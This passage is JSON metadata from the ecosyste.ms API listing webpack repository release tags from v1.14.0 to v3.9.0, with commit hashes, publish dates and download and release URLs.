e.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hos